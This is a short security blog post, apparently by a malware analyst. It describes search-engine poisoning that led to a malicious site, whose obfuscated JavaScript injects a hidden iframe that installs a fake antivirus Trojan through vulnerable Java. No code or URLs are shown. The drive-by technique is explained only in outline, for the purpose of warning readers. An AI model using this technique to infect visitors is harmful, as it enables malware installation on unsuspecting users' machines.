These are not the Google results you are looking for

One very common technique for the bad guys to get their malware on your computer is to infect/hack legitimate websites. Another method they use is to "poison" major search engines search results, so that these bad websites are the first results in the search. Most people will visit the first few results to see if they can find what they are looking for.

For instance, searching Google today for "mexican salsa dishes pottery" will demonstrate this beautifully.



The very first result is a malicious website. Please don't click on it, unless you are on an analysis machine. I use Malzilla to work with this website.



This looks immediately suspicious at first glance. For one thing, it looks like the javascript has been inserted at the very top of the HTML file, something you don't typically see with human generated HTML. Also, the javascript looks obfuscated.

Using Malzilla to decode the javascript:



We can see the javascript, when run, actually puts in a hidden iframe (size of 1 pixel) that loads code from another site. I'll save you the trip... it installs a Fake Antivirus Trojan, and will do so automatically if you have a vulnerable JAVA runtime (and most likely will try other vulnerabilities if that doesn't work.) In my case (on my analysis machine) it was JAVA.